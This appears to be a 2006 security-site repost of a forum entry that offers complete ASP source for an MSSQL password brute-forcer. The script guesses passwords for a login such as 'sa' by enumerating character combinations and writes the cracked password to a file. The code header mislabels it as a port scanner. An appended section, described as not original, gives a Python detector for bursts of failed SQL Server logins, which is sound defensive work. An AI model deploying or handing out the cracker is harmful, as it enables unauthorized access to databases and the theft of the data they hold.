MSSQL Cracker in ASP - vulnerability warning - the black bar safety net

2006-09-21T00:00:00
ID MYHACK58:62200611847
Type myhack58
Reporter Anonymous
Modified 2006-09-21T00:00:00

Description

An ASP program that brute-forces an MSSQL user's password, first published on the EST Forum. This version can keep running after the browser is closed; when the run completes, it writes a result file in the current directory. Doing this kind of work in ASP is very slow. Of course, the point of this program is not its efficiency, but... I will leave you a little suspense, otherwise it would be too boring.

Save the following code as an ASP file yourself. Of course, I still despise those who only change the author's name.

<%
'============ ASP Port Scanner by lake2===================
'http://lake2.0x54.org
'Version: 0.1
'For SpringBoard
'==========================================================
%>
<style type="text/css">
body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}
body {background-color: #ffffff;font-size:14px; }
a:link {color: #0000FF;text-decoration: none;}
a:visited {text-decoration: none;color: #0000FF;}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
.styleRed {color: #FF0000}
</style>
<title>MSSQL Cracker for SpringBoard</title>
<%
Dim Password()
If Request.Form("go") <> "1" Then
%>
<div align="center">Welcome to <a href="http://lake2.0x54.org" target="_blank">http://lake2.0x54.org</a></div>
<form name="form1" method="post" action="">
ConnStr: <input name="conn" type="text" class="TextBox" id="conn" value="Provider=SQLOLEDB.1;Data Source=127.0.0.1;User ID=sa;Password={PASS};" size="70"> <br>
Char: <input name="char" type="text" class="TextBox" id="char" value="0123456789" size="30"> <br>
Length: <input name="len" type="text" class="TextBox" id="len" value="3" size="4"> <br>
Path: <input name="path" type="text" class="TextBox" value="<%=Server.MapPath("r.txt")%>" size="50">
<input name="CFile" type="checkbox" class="TextBox" id="CFile" value="1" checked> Enablel<br>
<input name="go" type="hidden" id="go" value="1"> <br>
<input name="Submit" type="submit" class="buttom" id="Submit" value=" Run ">
</form>
<%
Else
    timer1 = timer
    Server.ScriptTimeout = 7776000
    ConnStr = Request.Form("Conn")
    Char = request.Form("char")
    LenChar = Len(Char)
    ReDim password(LenChar)
    For i = 1 to LenChar
        password(i) = Mid(Char, i, 1)
    Next
    length = CInt(request.Form("len"))
    Call LAKE("")
    response.Write "Done!<br>Process " & tTime & "s"
    If request.Form("CFile") <> "" Then CreateResult("Done!" & vbcrlf & tTime)
End If

Sub LAKE(str)
    If Len(str) >= length Then Exit Sub
    For j = 1 to LenChar
        pass = str & password(j)
        If Len(pass) = length Then Call Crack(pass)
        Call LAKE(pass)
    Next
End Sub

Sub Crack(str)
    On Error Resume Next
    Set conn = Server.CreateObject("ADODB.connection")
    conn.open Replace(ConnStr,"{PASS}",str)
    If Err Then
        If Err.Number <> -2147217843 Then
            response.Write(Err.Description & "<BR>")
            response.End()
        End If
    Else
        response.Write("I Get it ! The Password is <font color=red>" & str & "</font><BR>Process " & tTime & "s")
        If request.Form("CFile") <> "" Then CreateResult(str & vbcrlf & tTime)
        response.End()
    End If
End Sub

Function tTime()
    timer2 = timer
    thetime = cstr(int(timer2-timer1))
    tTime = thetime
End Function

Sub CreateResult(t)
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set outfile = fs.CreateTextFile(request.Form("path"))
    outfile.WriteLine t
    Set fs = Nothing
End Sub
%>
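A defender's view of the same activity, as an added example that is not part of the original post: every wrong guess made by a script like this is a failed SQL Server login, so a burst of failures for one login from one client, followed by a success, stands out in the server's error log. The log lines below are constructed samples modelled on the error log format with login auditing enabled for failed and successful logins; the threshold and window values are assumptions to tune.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed line shape: SQL Server error log with login auditing set to record
# both failed and successful logins.
LINE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d\d)\s+Logon\s+"
                  r"Login (failed|succeeded) for user '([^']*)'\..*\[CLIENT: ([^\]]+)\]")

def sample_log():
    """Constructed input: 12 failures for 'sa' in 3 s, then a success, then one typo."""
    lines = [f"2006-09-21 10:15:{i // 4:02d}.{i % 4 * 25:02d} Logon       "
             f"Login failed for user 'sa'. [CLIENT: 192.0.2.10]" for i in range(12)]
    lines.append("2006-09-21 10:15:03.00 Logon       Login succeeded for user 'sa'. "
                 "Connection made using SQL Server authentication. [CLIENT: 192.0.2.10]")
    lines.append("2006-09-21 11:00:00.00 Logon       "
                 "Login failed for user 'app'. [CLIENT: 192.0.2.77]")
    return lines

def detect(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {(client, user): alert} for failure bursts inside the window."""
    recent = defaultdict(deque)  # (client, user) -> timestamps of recent failures
    alerts = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S.%f")
        key = (m.group(4), m.group(3))
        q = recent[key]
        while q and ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if m.group(2) == "failed":
            q.append(ts)
            if len(q) >= threshold:
                a = alerts.setdefault(key, {"first": q[0], "peak": 0, "success_after": False})
                a["peak"] = max(a["peak"], len(q))
        elif key in alerts and q:
            # A success while the burst is still in the window: the guess may have landed.
            alerts[key]["success_after"] = True
    return alerts

if __name__ == "__main__":
    for (client, user), a in detect(sample_log()).items():
        print(f"{a['first']} client={client} user={user} "
              f"failures_in_window={a['peak']} success_after_burst={a['success_after']}")
```

Because the ASP page runs on the web server, the client address recorded for these logins is the web server's own, so an alert keyed on that address points at a script hosted there rather than at a remote workstation.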